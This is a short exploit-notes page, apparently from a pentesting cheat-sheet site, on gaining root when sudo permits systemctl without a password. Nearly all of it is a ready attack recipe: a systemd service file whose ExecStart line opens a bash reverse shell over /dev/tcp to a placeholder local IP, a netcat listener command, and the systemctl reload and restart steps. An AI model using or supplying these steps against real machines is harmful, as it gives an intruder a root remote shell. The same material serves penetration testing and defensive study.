Exploit Notes

Sudo Systemctl Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.

Investigation

sudo -l

(ALL) NOPASSWD: systemctl

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.


Exploitation

1. Update the Config File

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target

Replace “<local-ip>” with your local ip address.

2. Start Listener in Local Machine

Then start listener for getting a root shell.

nc -lvnp 4444

3. Restart the Service

Reload the daemon and restart.

sudo systemctl daemon-reload
sudo systemctl restart example.service

Now we should get a shell in local machine.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.